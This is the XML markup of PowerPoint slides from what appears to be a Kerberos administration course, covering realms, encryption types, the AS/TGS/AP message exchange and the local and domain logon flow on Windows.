        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143700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Kerberos Realms and Domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1508105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Kerberos realm is a organizational boundary like a domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A realm or domain has its own set of KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Kerberos authentication, Active Directory domains fulfill all the requirements of Kerberos realms.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137534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Encryption Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4078039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos can use a variety of cipher algorithms to protect data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption Types in Kerberos are chosen automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The selected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EncType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> depends on the operating systems involved and the account configuration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Encryption Type Selection in Kerberos Exchanges</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Windows Configurations for Kerberos Supported Encryption Type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Audit Kerberos Service Ticket Operations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>events inform about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EncTypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configures in the AD attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msDS-SupportedEncryptionTypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and if this is empty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userAccountControl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>NOTE: RC4 might be used for service accounts if not explicitly changed in AD.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69113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dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Workstation Logon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123801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Kerberos message summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2323713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The next slide will discuss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>only briefly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>how a user uses Kerberos to authenticate to the local workstation as well as to network resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AS Request / Reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS Request / Reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AP Request / Reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All the details will be covered</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>very soon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="2430650"/>
            <a:ext cx="1728192"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1. KRB_AS_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5148064" y="2790690"/>
            <a:ext cx="1714006"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2. KRB_AS_REP</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0272" y="2544181"/>
            <a:ext cx="924805" cy="1092021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="3294746"/>
            <a:ext cx="1728192"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3. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5148064" y="3654786"/>
            <a:ext cx="1714006"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4. KRB_TGS_REP</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6697" y="5229200"/>
            <a:ext cx="758937" cy="1042227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3876744" y="4257653"/>
            <a:ext cx="1402518"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6. KRB_AP_REP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3542790" y="4279606"/>
            <a:ext cx="1352037"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5. KRB_AP_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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23928" y="2555818"/>
            <a:ext cx="989101" cy="918210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71666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par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(righ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par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">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up)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="2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Local Logon Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2677656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GINA passes the credential to the LSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LSA forwards it to the SSPI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSPI passes it further to the default SSP </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Kerberos)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logon target name == local computer </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt; Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The data now goes to NTLM SSP which</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can do a local logon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="985795"/>
            <a:ext cx="3240360" cy="1339896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="2907431"/>
            <a:ext cx="3240360" cy="45737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Local Security Authority (LSA)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Down Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156175" y="2400537"/>
            <a:ext cx="216024" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Down Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7712608" y="2400537"/>
            <a:ext cx="216024" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="3959886"/>
            <a:ext cx="3240360" cy="45737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t>Security Support Provider Interface (SSPI Negotiate)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Down Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156175" y="3452992"/>
            <a:ext cx="216024" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7712608" y="3452992"/>
            <a:ext cx="216024" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="5025661"/>
            <a:ext cx="1440159" cy="45737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t>Kerberos SSP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7712608" y="4518767"/>
            <a:ext cx="216024" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="down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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164289" y="5025661"/>
            <a:ext cx="1440159" cy="45737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t>NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SSP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885210" y="2508839"/>
            <a:ext cx="149080" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885210" y="3561284"/>
            <a:ext cx="149080" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5748405" y="4628107"/>
            <a:ext cx="149080" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6048163" y="4498772"/>
            <a:ext cx="432048" cy="445378"/>
            <a:chOff x="1259104" y="4077935"/>
            <a:chExt cx="432048" cy="445378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Down Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1259104" y="4091265"/>
              <a:ext cx="216024" cy="432048"/>
            </a:xfrm>
            <a:prstGeom prst="down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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Down Arrow 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1475128" y="4077935"/>
              <a:ext cx="216024" cy="432048"/>
            </a:xfrm>
            <a:prstGeom prst="down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de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621695" y="4627069"/>
            <a:ext cx="149080" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7446384" y="4632205"/>
            <a:ext cx="149080" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7472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Audience</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3000821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Company affiliation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Title/function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Job responsibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Already existing experience with Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you have experience in all of these topics?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL, IIS and managing web applications, IE, AD, Visual Studio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Your expectations for the course</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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238846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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Logon Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3616375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kerberos client requests and then receives a TGT from the KDC.</a:t>
            </a:r>
